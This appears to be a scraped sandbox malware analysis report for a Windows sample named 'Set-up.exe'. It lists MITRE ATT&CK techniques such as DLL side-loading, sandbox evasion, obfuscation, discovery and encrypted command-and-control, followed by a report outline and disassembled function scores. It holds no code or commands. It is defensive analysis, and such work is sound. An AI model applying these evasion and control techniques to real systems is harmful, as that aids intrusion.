Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Statistics

CPU Usage

Windows Analysis Report
Set-up.exe

Function 00DC29FF Relevance: 63.3, APIs: 20, Strings: 16, Instructions: 321
stringprocessregistryCOMMON

Function 00DC255D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 282
filestringCOMMON

Function 00E8AA30 Relevance: 19.9, APIs: 13, Instructions: 364
networkCOMMON

Function 00DC116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 01148E90 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 01268E70 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
COMMON

Function 00DD05B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 369
networkCOMMON

Function 00E89740 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 736
registrystringCOMMON

Function 00DC2F17 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 144
registryCOMMON

Function 00F9E5D0 Relevance: 19.6, APIs: 13, Instructions: 107
filestringCOMMON

Function 00DF8B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263
networkCOMMON

Function 00DC76A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69
networkCOMMON

Function 00F447B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95
stringCOMMON

Function 00DC31D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73
processCOMMON

Function 00DC7770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69
networkCOMMON